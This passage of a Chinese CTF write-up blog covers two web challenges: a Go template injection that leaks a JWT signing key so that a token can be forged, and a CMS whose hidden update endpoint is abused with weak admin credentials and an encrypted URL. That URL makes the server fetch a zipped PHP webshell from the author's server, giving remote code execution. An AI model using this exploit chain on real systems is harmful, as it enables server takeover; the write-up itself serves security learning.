class="string">&quot;/auth&quot;</span>, authHandler)</span><br><span class="line">	r.POST(<span class="string">&quot;/register&quot;</span>, Resist)</span><br><span class="line">	r.Run(<span class="string">&quot;:80&quot;</span>)</span><br><span class="line"></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>审计一番后可以发现有个流程的<code>register-&gt;auth-&gt;flag</code><br>先注册一个register，然后去auth界面输入我们的用户和密码，会返回一个jwt，但是从源码中我们不知道key<br>分析一下<code>rootHandler</code>函数，可以看到有一个<code>tpl.Execute(c.Writer, &amp;acc)</code>，这个函数会解析模板，也就是考虑此处有个ssti注入，检索了一下go的ssti：</p>
<blockquote>
<p><code>&#123;&#123;.&#125;&#125;</code> 表示当前对象，如user对象</p>
<p><code>&#123;&#123;.FieldName&#125;&#125;</code> 表示对象的某个字段</p>
<p><code>&#123;&#123;range …&#125;&#125;&#123;&#123;end&#125;&#125;</code> go中for…range语法类似，循环</p>
<p><code>&#123;&#123;with …&#125;&#125;&#123;&#123;end&#125;&#125;</code> 当前对象的值，上下文</p>
<p><code>&#123;&#123;if …&#125;&#125;\&#123;\&#123;else&#125;&#125;\&#123;\&#123;end&#125;&#125;</code> go中的if-else语法类似，条件选择</p>
<p><code>&#123;&#123;xxx | xxx&#125;&#125;</code> 左边的输出作为右边的输入</p>
<p><code>&#123;&#123;template "navbar"&#125;&#125;</code> 引入子模版</p>
</blockquote>
<p>这边我们不可以直接<code>&#123;&#123;.secret_key&#125;&#125;</code>获取key，因为解析的acc数组，不是实例化对象，所以得不到key，这里需要用<code>\&#123;\&#123;.&#125;&#125;</code>去获取当前对象的整体属性，来获取key<br>思路就很清晰了，先注册一个账号，再去auth认证得到jwt，再去<code>/</code>携带X-Token发送post获取key，最后伪造一个jwt，去<code>/flag</code>获取flag<br><img src="https://cdn.nlark.com/yuque/0/2022/png/32634994/1670590094102-76ef2d5f-7dde-4c49-8fb1-1a8da61d7800.png#averageHue=%23f9f9f9&clientId=u87f903c0-2128-4&from=paste&height=444&id=udedfdaa8&name=image.png&originHeight=555&originWidth=1297&originalType=binary&ratio=1&rotation=0&showTitle=false&size=81403&status=done&style=none&taskId=u5ee3c4af-8942-403a-8619-098dbad6d10&title=&width=1037.6" alt="image.png"><br>获取key为<code>fasdf972u1041xu90zm10Av</code></p>
<p><img src="https://cdn.nlark.com/yuque/0/2022/png/32634994/1670589961933-2f24e940-eb00-4aa2-854a-387bfbfa5a2d.png#averageHue=%23f9f9f8&clientId=u87f903c0-2128-4&from=paste&height=450&id=u98d1a20a&name=image.png&originHeight=563&originWidth=1316&originalType=binary&ratio=1&rotation=0&showTitle=false&size=88963&status=done&style=none&taskId=u5c7b7106-3758-459b-b356-5074ed44abd&title=&width=1052.8" alt="image.png"></p>
<h2 id="ezcms"><a href="#ezcms" class="headerlink" title="ezcms"></a>ezcms</h2><p>考点：PHP代码审计，弱口令，远程文件包含<br>直接就白盒了，但是文件多的和屎一样<br>发现一个admin.php，我们就直接进去：<br>一个登录界面，admin&#x2F;123456&#x2F;123456，认证码和密码都是123456<br><img src="https://cdn.nlark.com/yuque/0/2022/png/32634994/1670594969453-a7fd45ce-f4cd-4392-810c-290fd694a0b6.png#averageHue=%23e8e4e1&clientId=u87f903c0-2128-4&from=paste&height=828&id=u632d2d43&name=image.png&originHeight=1035&originWidth=1920&originalType=binary&ratio=1&rotation=0&showTitle=false&size=183061&status=done&style=none&taskId=u60b4bec8-8942-4e1f-a626-5a35cdc815b&title=&width=1536" alt="image.png"><br>在这里找了一会儿也没啥东西，有个数据库，但是里面没东西，审计了一下源码，发现了一个update.php,这个文件没在前台显示<br><img src="https://cdn.nlark.com/yuque/0/2022/png/32634994/1670595093847-f4c168f7-3d28-41d1-a009-599c7fa9217d.png#averageHue=%23232626&clientId=u87f903c0-2128-4&from=paste&height=516&id=uf4b96164&name=image.png&originHeight=645&originWidth=1125&originalType=binary&ratio=1&rotation=0&showTitle=false&size=122895&status=done&style=none&taskId=u660651f4-7fd7-46d3-b453-6fec26da463&title=&width=900" alt="image.png"><br>发现了一个更新的功能，他会下载远程的文件，并且解压，那我们岂不是在自己的VPS把一句话木马套一个ZIP，然后让他下载解压，我们不就蚁剑上号了？<br>思路就这样很简单，但是还需要分析一下<code>sys_auth</code>函数，他对我们传入的url做了加密：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br></pre></td><td class="code"><pre><span class="line">/字符加密、解密</span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">sys_auth</span>(<span class="params"><span class="variable">$string</span>, <span class="variable">$type</span> = <span class="number">0</span>, <span class="variable">$key</span> = <span class="string">&#x27;&#x27;</span>, <span class="variable">$expiry</span> = <span class="number">0</span></span>) </span>&#123;</span><br><span class="line">	<span class="keyword">if</span>(<span class="title function_ invoke__">is_array</span>(<span class="variable">$string</span>)) <span class="variable">$string</span> = <span class="title function_ invoke__">json_encode</span>(<span class="variable">$string</span>);</span><br><span class="line">	<span class="keyword">if</span>(<span class="variable">$type</span> == <span class="number">1</span>) <span class="variable">$string</span> = <span class="title function_ invoke__">str_replace</span>(<span class="string">&#x27;-&#x27;</span>,<span class="string">&#x27;+&#x27;</span>,<span class="variable">$string</span>);</span><br><span class="line">	<span class="variable">$ckey_length</span> = <span class="number">4</span>;</span><br><span class="line">	<span class="variable">$key</span> = <span class="title function_ invoke__">md5</span>(<span class="variable">$key</span> ? <span class="variable">$key</span> : Mc_Encryption_Key);</span><br><span class="line">	<span class="variable">$keya</span> = <span class="title function_ invoke__">md5</span>(<span class="title function_ invoke__">substr</span>(<span class="variable">$key</span>, <span class="number">0</span>, <span class="number">16</span>));</span><br><span class="line">	<span class="variable">$keyb</span> = <span class="title function_ invoke__">md5</span>(<span class="title function_ invoke__">substr</span>(<span class="variable">$key</span>, <span class="number">16</span>, <span class="number">16</span>));</span><br><span class="line">	<span class="variable">$keyc</span> = <span class="variable">$ckey_length</span> ? (<span class="variable">$type</span> == <span class="number">1</span> ? <span class="title function_ invoke__">substr</span>(<span class="variable">$string</span>, <span class="number">0</span>, <span class="variable">$ckey_length</span>): <span class="title function_ invoke__">substr</span>(<span class="title function_ invoke__">md5</span>(<span class="title function_ invoke__">microtime</span>()), -<span class="variable">$ckey_length</span>)) : <span class="string">&#x27;&#x27;</span>;</span><br><span class="line">	<span class="variable">$cryptkey</span> = <span class="variable">$keya</span>.<span class="title function_ invoke__">md5</span>(<span class="variable">$keya</span>.<span class="variable">$keyc</span>);</span><br><span class="line">	<span class="variable">$key_length</span> = <span class="title function_ invoke__">strlen</span>(<span class="variable">$cryptkey</span>);</span><br><span class="line">	<span class="variable">$string</span> = <span class="variable">$type</span> == <span class="number">1</span> ? <span class="title function_ invoke__">base64_decode</span>(<span class="title function_ invoke__">substr</span>(<span class="variable">$string</span>, <span class="variable">$ckey_length</span>)) :  <span class="title function_ invoke__">sprintf</span>(<span class="string">&#x27;%010d&#x27;</span>, <span class="variable">$expiry</span> ? <span class="variable">$expiry</span> + <span class="title function_ invoke__">time</span>() : <span class="number">0</span>).<span class="title function_ invoke__">substr</span>(<span class="title function_ invoke__">md5</span>(<span class="variable">$string</span>.<span class="variable">$keyb</span>), <span class="number">0</span>, <span class="number">16</span>).<span class="variable">$string</span>;</span><br><span class="line">	<span class="variable">$string_length</span> = <span class="title function_ invoke__">strlen</span>(<span class="variable">$string</span>);</span><br><span class="line">	<span class="variable">$result</span> = <span class="string">&#x27;&#x27;</span>;</span><br><span class="line">	<span class="variable">$box</span> = <span class="title function_ invoke__">range</span>(<span class="number">0</span>, <span class="number">255</span>);</span><br><span class="line">	<span class="variable">$rndkey</span> = <span class="keyword">array</span>();</span><br><span class="line">	<span class="keyword">for</span>(<span class="variable">$i</span> = <span class="number">0</span>; <span class="variable">$i</span> &lt;= <span class="number">255</span>; <span class="variable">$i</span>++) &#123;</span><br><span class="line">		<span class="variable">$rndkey</span>[<span class="variable">$i</span>] = <span class="title function_ invoke__">ord</span>(<span class="variable">$cryptkey</span>[<span class="variable">$i</span> % <span class="variable">$key_length</span>]);</span><br><span class="line">	&#125;</span><br><span class="line">	<span class="keyword">for</span>(<span class="variable">$j</span> = <span class="variable">$i</span> = <span class="number">0</span>; <span class="variable">$i</span> &lt; <span class="number">256</span>; <span class="variable">$i</span>++) &#123;</span><br><span class="line">		<span class="variable">$j</span> = (<span class="variable">$j</span> + <span class="variable">$box</span>[<span class="variable">$i</span>] + <span class="variable">$rndkey</span>[<span class="variable">$i</span>]) % <span class="number">256</span>;</span><br><span class="line">		<span class="variable">$tmp</span> = <span class="variable">$box</span>[<span class="variable">$i</span>];</span><br><span class="line">		<span class="variable">$box</span>[<span class="variable">$i</span>] = <span class="variable">$box</span>[<span class="variable">$j</span>];</span><br><span class="line">		<span class="variable">$box</span>[<span class="variable">$j</span>] = <span class="variable">$tmp</span>;</span><br><span class="line">	&#125;</span><br><span class="line">	<span class="keyword">for</span>(<span class="variable">$a</span> = <span class="variable">$j</span> = <span class="variable">$i</span> = <span class="number">0</span>; <span class="variable">$i</span> &lt; <span class="variable">$string_length</span>; <span class="variable">$i</span>++) &#123;</span><br><span class="line">		<span class="variable">$a</span> = (<span class="variable">$a</span> + <span class="number">1</span>) % <span class="number">256</span>;</span><br><span class="line">		<span class="variable">$j</span> = (<span class="variable">$j</span> + <span class="variable">$box</span>[<span class="variable">$a</span>]) % <span class="number">256</span>;</span><br><span class="line">		<span class="variable">$tmp</span> = <span class="variable">$box</span>[<span class="variable">$a</span>];</span><br><span class="line">		<span class="variable">$box</span>[<span class="variable">$a</span>] = <span class="variable">$box</span>[<span class="variable">$j</span>];</span><br><span class="line">		<span class="variable">$box</span>[<span class="variable">$j</span>] = <span class="variable">$tmp</span>;</span><br><span class="line">		<span class="variable">$result</span> .= <span class="title function_ invoke__">chr</span>(<span class="title function_ invoke__">ord</span>(<span class="variable">$string</span>[<span class="variable">$i</span>]) ^ (<span class="variable">$box</span>[(<span class="variable">$box</span>[<span class="variable">$a</span>] + <span class="variable">$box</span>[<span class="variable">$j</span>]) % <span class="number">256</span>]));</span><br><span class="line">	&#125; </span><br><span class="line">	<span class="keyword">if</span>(<span class="variable">$type</span> == <span class="number">1</span>) &#123;</span><br><span class="line">		<span class="keyword">if</span>((<span class="title function_ invoke__">substr</span>(<span class="variable">$result</span>, <span class="number">0</span>, <span class="number">10</span>) == <span class="number">0</span> || <span class="title function_ invoke__">substr</span>(<span class="variable">$result</span>, <span class="number">0</span>, <span class="number">10</span>) - <span class="title function_ invoke__">time</span>() &gt; <span class="number">0</span>) &amp;&amp; <span class="title function_ invoke__">substr</span>(<span class="variable">$result</span>, <span class="number">10</span>, <span class="number">16</span>) == <span class="title function_ invoke__">substr</span>(<span class="title function_ invoke__">md5</span>(<span class="title function_ invoke__">substr</span>(<span class="variable">$result</span>, <span class="number">26</span>).<span class="variable">$keyb</span>), <span class="number">0</span>, <span class="number">16</span>)) &#123;</span><br><span class="line">			<span class="variable">$result</span> = <span class="title function_ invoke__">substr</span>(<span class="variable">$result</span>, <span class="number">26</span>);</span><br><span class="line">			<span class="variable">$json</span> = <span class="title function_ invoke__">json_decode</span>(<span class="variable">$result</span>,<span class="number">1</span>);</span><br><span class="line">			<span class="keyword">if</span>(!<span class="title function_ invoke__">is_numeric</span>(<span class="variable">$result</span>) &amp;&amp; <span class="variable">$json</span>)&#123;</span><br><span class="line">				<span class="keyword">return</span> <span class="variable">$json</span>;</span><br><span class="line">			&#125;<span class="keyword">else</span>&#123;</span><br><span class="line">				<span class="keyword">return</span> <span class="variable">$result</span>;</span><br><span class="line">			&#125;</span><br><span class="line">		&#125;</span><br><span class="line">		<span class="keyword">return</span> <span class="string">&#x27;&#x27;</span>;</span><br><span class="line">	&#125;</span><br><span class="line">	<span class="keyword">return</span> <span class="title function_ invoke__">str_replace</span>(<span class="string">&#x27;+&#x27;</span>, <span class="string">&#x27;-&#x27;</span>, <span class="variable">$keyc</span>.<span class="title function_ invoke__">str_replace</span>(<span class="string">&#x27;=&#x27;</span>, <span class="string">&#x27;&#x27;</span>, <span class="title function_ invoke__">base64_encode</span>(<span class="variable">$result</span>)));</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>这边我们就直接构造poc了：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="title function_ invoke__">define</span>(<span class="string">&#x27;Mc_Encryption_Key&#x27;</span>,<span class="string">&#x27;GKwHuLj9AOhaxJ2&#x27;</span>);</span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">sys_auth</span>(<span class="params"><span class="variable">$string</span>, <span class="variable">$type</span> = <span class="number">0</span>, <span class="variable">$key</span> = <span class="string">&#x27;&#x27;</span>, <span class="variable">$expiry</span> = <span class="number">0</span></span>) </span>&#123;</span><br><span class="line">    <span class="keyword">if</span>(<span class="title function_ invoke__">is_array</span>(<span class="variable">$string</span>)) <span class="variable">$string</span> = <span class="title function_ invoke__">json_encode</span>(<span class="variable">$string</span>);</span><br><span class="line">    <span class="keyword">if</span>(<span class="variable">$type</span> == <span class="number">1</span>) <span class="variable">$string</span> = <span class="title function_ invoke__">str_replace</span>(<span class="string">&#x27;-&#x27;</span>,<span class="string">&#x27;+&#x27;</span>,<span class="variable">$string</span>);</span><br><span class="line">    <span class="variable">$ckey_length</span> = <span class="number">4</span>;</span><br><span class="line">    <span class="variable">$key</span> = <span class="title function_ invoke__">md5</span>(<span class="variable">$key</span> ? <span class="variable">$key</span> : Mc_Encryption_Key);</span><br><span class="line">    <span class="variable">$keya</span> = <span class="title function_ invoke__">md5</span>(<span class="title function_ invoke__">substr</span>(<span class="variable">$key</span>, <span class="number">0</span>, <span class="number">16</span>));</span><br><span class="line">    <span class="variable">$keyb</span> = <span class="title function_ invoke__">md5</span>(<span class="title function_ invoke__">substr</span>(<span class="variable">$key</span>, <span class="number">16</span>, <span class="number">16</span>));</span><br><span class="line">    <span class="variable">$keyc</span> = <span class="variable">$ckey_length</span> ? (<span class="variable">$type</span> == <span class="number">1</span> ? <span class="title function_ invoke__">substr</span>(<span class="variable">$string</span>, <span class="number">0</span>, <span class="variable">$ckey_length</span>): <span class="title function_ invoke__">substr</span>(<span class="title function_ invoke__">md5</span>(<span class="title function_ invoke__">microtime</span>()), -<span class="variable">$ckey_length</span>)) : <span class="string">&#x27;&#x27;</span>;</span><br><span class="line">    <span class="variable">$cryptkey</span> = <span class="variable">$keya</span>.<span class="title function_ invoke__">md5</span>(<span class="variable">$keya</span>.<span class="variable">$keyc</span>);</span><br><span class="line">    <span class="variable">$key_length</span> = <span class="title function_ invoke__">strlen</span>(<span class="variable">$cryptkey</span>);</span><br><span class="line">    <span class="variable">$string</span> = <span class="variable">$type</span> == <span class="number">1</span> ? <span class="title function_ invoke__">base64_decode</span>(<span class="title function_ invoke__">substr</span>(<span class="variable">$string</span>, <span class="variable">$ckey_length</span>)) :  <span class="title function_ invoke__">sprintf</span>(<span class="string">&#x27;%010d&#x27;</span>, <span class="variable">$expiry</span> ? <span class="variable">$expiry</span> + <span class="title function_ invoke__">time</span>() : <span class="number">0</span>).<span class="title function_ invoke__">substr</span>(<span class="title function_ invoke__">md5</span>(<span class="variable">$string</span>.<span class="variable">$keyb</span>), <span class="number">0</span>, <span class="number">16</span>).<span class="variable">$string</span>;</span><br><span class="line">    <span class="variable">$string_length</span> = <span class="title function_ invoke__">strlen</span>(<span class="variable">$string</span>);</span><br><span class="line">    <span class="variable">$result</span> = <span class="string">&#x27;&#x27;</span>;</span><br><span class="line">    <span class="variable">$box</span> = <span class="title function_ invoke__">range</span>(<span class="number">0</span>, <span class="number">255</span>);</span><br><span class="line">    <span class="variable">$rndkey</span> = <span class="keyword">array</span>();</span><br><span class="line">    <span class="keyword">for</span>(<span class="variable">$i</span> = <span class="number">0</span>; <span class="variable">$i</span> &lt;= <span class="number">255</span>; <span class="variable">$i</span>++) &#123;</span><br><span class="line">        <span class="variable">$rndkey</span>[<span class="variable">$i</span>] = <span class="title function_ invoke__">ord</span>(<span class="variable">$cryptkey</span>[<span class="variable">$i</span> % <span class="variable">$key_length</span>]);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">for</span>(<span class="variable">$j</span> = <span class="variable">$i</span> = <span class="number">0</span>; <span class="variable">$i</span> &lt; <span class="number">256</span>; <span class="variable">$i</span>++) &#123;</span><br><span class="line">        <span class="variable">$j</span> = (<span class="variable">$j</span> + <span class="variable">$box</span>[<span class="variable">$i</span>] + <span class="variable">$rndkey</span>[<span class="variable">$i</span>]) % <span class="number">256</span>;</span><br><span class="line">        <span class="variable">$tmp</span> = <span class="variable">$box</span>[<span class="variable">$i</span>];</span><br><span class="line">        <span class="variable">$box</span>[<span class="variable">$i</span>] = <span class="variable">$box</span>[<span class="variable">$j</span>];</span><br><span class="line">        <span class="variable">$box</span>[<span class="variable">$j</span>] = <span class="variable">$tmp</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">for</span>(<span class="variable">$a</span> = <span class="variable">$j</span> = <span class="variable">$i</span> = <span class="number">0</span>; <span class="variable">$i</span> &lt; <span class="variable">$string_length</span>; <span class="variable">$i</span>++) &#123;</span><br><span class="line">        <span class="variable">$a</span> = (<span class="variable">$a</span> + <span class="number">1</span>) % <span class="number">256</span>;</span><br><span class="line">        <span class="variable">$j</span> = (<span class="variable">$j</span> + <span class="variable">$box</span>[<span class="variable">$a</span>]) % <span class="number">256</span>;</span><br><span class="line">        <span class="variable">$tmp</span> = <span class="variable">$box</span>[<span class="variable">$a</span>];</span><br><span class="line">        <span class="variable">$box</span>[<span class="variable">$a</span>] = <span class="variable">$box</span>[<span class="variable">$j</span>];</span><br><span class="line">        <span class="variable">$box</span>[<span class="variable">$j</span>] = <span class="variable">$tmp</span>;</span><br><span class="line">        <span class="variable">$result</span> .= <span class="title function_ invoke__">chr</span>(<span class="title function_ invoke__">ord</span>(<span class="variable">$string</span>[<span class="variable">$i</span>]) ^ (<span class="variable">$box</span>[(<span class="variable">$box</span>[<span class="variable">$a</span>] + <span class="variable">$box</span>[<span class="variable">$j</span>]) % <span class="number">256</span>]));</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">if</span>(<span class="variable">$type</span> == <span class="number">1</span>) &#123;</span><br><span class="line">        <span class="keyword">if</span>((<span class="title function_ invoke__">substr</span>(<span class="variable">$result</span>, <span class="number">0</span>, <span class="number">10</span>) == <span class="number">0</span> || <span class="title function_ invoke__">substr</span>(<span class="variable">$result</span>, <span class="number">0</span>, <span class="number">10</span>) - <span class="title function_ invoke__">time</span>() &gt; <span class="number">0</span>) &amp;&amp; <span class="title function_ invoke__">substr</span>(<span class="variable">$result</span>, <span class="number">10</span>, <span class="number">16</span>) == <span class="title function_ invoke__">substr</span>(<span class="title function_ invoke__">md5</span>(<span class="title function_ invoke__">substr</span>(<span class="variable">$result</span>, <span class="number">26</span>).<span class="variable">$keyb</span>), <span class="number">0</span>, <span class="number">16</span>)) &#123;</span><br><span class="line">            <span class="variable">$result</span> = <span class="title function_ invoke__">substr</span>(<span class="variable">$result</span>, <span class="number">26</span>);</span><br><span class="line">            <span class="variable">$json</span> = <span class="title function_ invoke__">json_decode</span>(<span class="variable">$result</span>,<span class="number">1</span>);</span><br><span class="line">            <span class="keyword">if</span>(!<span class="title function_ invoke__">is_numeric</span>(<span class="variable">$result</span>) &amp;&amp; <span class="variable">$json</span>)&#123;</span><br><span class="line">                <span class="keyword">return</span> <span class="variable">$json</span>;</span><br><span class="line">            &#125;<span class="keyword">else</span>&#123;</span><br><span class="line">                <span class="keyword">return</span> <span class="variable">$result</span>;</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">return</span> <span class="string">&#x27;&#x27;</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">return</span> <span class="title function_ invoke__">str_replace</span>(<span class="string">&#x27;+&#x27;</span>, <span class="string">&#x27;-&#x27;</span>, <span class="variable">$keyc</span>.<span class="title function_ invoke__">str_replace</span>(<span class="string">&#x27;=&#x27;</span>, <span class="string">&#x27;&#x27;</span>, <span class="title function_ invoke__">base64_encode</span>(<span class="variable">$result</span>)));</span><br><span class="line">&#125;</span><br><span class="line"><span class="variable">$url</span>=<span class="string">&quot;http://175.178.154.216/3.zip&quot;</span>;</span><br><span class="line"><span class="title function_ invoke__">var_dump</span>(<span class="title function_ invoke__">sys_auth</span>(<span class="variable">$url</span>));</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>
<p><img src="https://cdn.nlark.com/yuque/0/2022/png/32634994/1670595183234-1803e53f-a330-46eb-a912-6ab28de75eaf.png#averageHue=%23988062&clientId=u87f903c0-2128-4&from=paste&height=98&id=ua1994db2&name=image.png&originHeight=123&originWidth=1326&originalType=binary&ratio=1&rotation=0&showTitle=false&size=24535&status=done&style=none&taskId=ue85f8aae-c4e9-47a9-b0ae-c3e06963346&title=&width=1060.8" alt="image.png"><br>把这个参数在update路由get方式传入：<br><img src="https://cdn.nlark.com/yuque/0/2022/png/32634994/1670595202852-8a270022-451c-40a6-b7b5-ddc57f96b485.png#averageHue=%23fdfdfd&clientId=u87f903c0-2128-4&from=paste&height=193&id=ue8f00073&name=image.png&originHeight=241&originWidth=1920&originalType=binary&ratio=1&rotation=0&showTitle=false&size=28284&status=done&style=none&taskId=ubf5e6183-9425-4fcc-b19f-aaf659cab5a&title=&width=1536" alt="image.png"><br>最后再网站根目录访问<code>3.php</code>可以RCE：<br><img src="https://cdn.nlark.com/yuque/0/2022/png/32634994/1670595220410-68b75c18-f5fd-4ab2-bd42-c3df4d97cde2.png#averageHue=%23ddc294&clientId=u87f903c0-2128-4&from=paste&height=835&id=u1afd2fcb&name=image.png&originHeight=1044&originWidth=1920&originalType=binary&ratio=1&rotation=0&showTitle=false&size=102900&status=done&style=none&taskId=u746d8063-b501-419a-860d-32225791038&title=&width=1536" alt="image.png"><br>可喜可贺可喜可贺<br>这里我思考出了一个小tips，遇到CMS框架，先把他当做渗透测试一样打一通，发现没思路再看看源码！</p>

    </div>

    
    <div class="about">
        <h1>About this Post</h1>
        <div class="details">
            <p>This post is written by Boogipop, licensed under <a target="_blank" rel="noopener" href="https://creativecommons.org/licenses/by-nc/4.0">CC BY-NC 4.0</a>.</p>
        </div>
        
        <p class="tags">
            
            <i class="icon"></i>
            <a href="/tags/WriteUp/" class="tag">#WriteUp</a><a href="/tags/DASCTF/" class="tag">#DASCTF</a>
        </p>
        
    </div>
    

    <div class="container post-prev-next">
        
        <a href="/2023/03/02/DASCTF2022.07%E8%B5%8B%E8%83%BD%E8%B5%9B/" class="next">
            <div>
                <div class="text">
                    <p class="label">Next</p>
                    <h3 class="title">DASCTF 七月赋能赛</h3>
                </div>
            </div>
        </a>
        
        
        <a href="/2023/03/02/Stocker/" class="prev">
            <div>
                <div class="text">
                    <p class="label">Previous</p>
                    <h3 class="title">Stocker</>
                </div>
            </div>
        </a>
        
    </div>

    
        
        
        <script src="https://giscus.app/client.js" data-repo="Boogipop/Boogipop.github.io" data-repo-id="R_kgDOIFi78g" data-category="Announcements" data-category-id="DIC_kwDOIFi78s4Cav9f" data-mapping="pathname" data-strict="1" data-reactions-enabled="1" data-emit-metadata="0" data-input-position="top" data-theme="preferred_color_scheme" data-lang="zh-CN" crossorigin="anonymous" async></script>
        
    
</article>

        <footer>
    <div class="inner">
        <div class="links">
            
            <div class="group">
                <h2 class="title">Blog</h2>
                
                <a href="/" class="item">Blog</a>
                
                <a href="/archives" class="item">Archives</a>
                
                <a href="/tags" class="item">Tags</a>
                
                <a href="/categories" class="item">Categories</a>
                
                <a href="/search" class="item">Search</a>
                
                <a href="/friends" class="item">Friends</a>
                
                <a href="/about" class="item">About</a>
                
                <a href="/atom.xml" class="item">RSS</a>
                
            </div>
            
            <div class="group">
                <h2 class="title">Projects</h2>
                
                <a target="_blank" rel="noopener" href="https://github.com/MrWillCom/rsa-cli" class="item">RSA CLI</a>
                
                <a target="_blank" rel="noopener" href="https://github.com/MrWillCom/hexo-theme-cupertino" class="item">Hexo Theme Cupertino</a>
                
                <a target="_blank" rel="noopener" href="https://github.com/MrWillCom/a-calendar" class="item">A Calendar</a>
                
                <a target="_blank" rel="noopener" href="https://github.com/MrWillCom/auto-mirroring-bucket" class="item">Auto Mirroring Bucket</a>
                
            </div>
            
            <div class="group">
                <h2 class="title">Me</h2>
                
                <a target="_blank" rel="noopener" href="https://github.com/MrWillCom" class="item">GitHub</a>
                
                <a target="_blank" rel="noopener" href="https://codepen.io/mrwillcom" class="item">CodePen</a>
                
                <a target="_blank" rel="noopener" href="https://www.patreon.com/MrWillCom" class="item">Patreon</a>
                
                <a target="_blank" rel="noopener" href="https://noc.social/@MrWillCom" class="item">Mastodon</a>
                
                <a target="_blank" rel="noopener" href="https://discord.gg/UKuFDjcfY8" class="item">Discord</a>
                
                <a href="mailto:mr.will.com@outlook.com" class="item">Email</a>
                
            </div>
            
        </div>
        <span>&copy; 2024 Boogipop<br>Powered by <a href="http://hexo.io/" target="_blank">Hexo</a> </span>
        
        
            <br>
            <div class="color-scheme-toggle" role="radiogroup" id="theme-color-scheme-toggle">
                <label>
                    <input type="radio" value="light">
                    <span>Light</span>
                </label>
                <label>
                    <input type="radio" value="dark">
                    <span>Dark</span>
                </label>
                <label>
                    <input type="radio" value="auto">
                    <span>Auto</span>
                </label>
            </div>
        
    </div>
</footer>


        
<script src="/js/main.js"></script>

        
        
        

        
        <script src="https://unpkg.com/scrollreveal"></script>
		
        <script>
            window.addEventListener('load', () => {
                ScrollReveal({ delay: 250, reset: true, easing: 'cubic-bezier(0, 0, 0, 1)' })
                ScrollReveal().reveal('.post-list-item .cover-img img')
                ScrollReveal().reveal('.post-list-item, .card, .content p img, .content .block-large img', { distance: '60px', origin: 'bottom', duration: 800 })
            })
        </script>
        
    </body>
</html>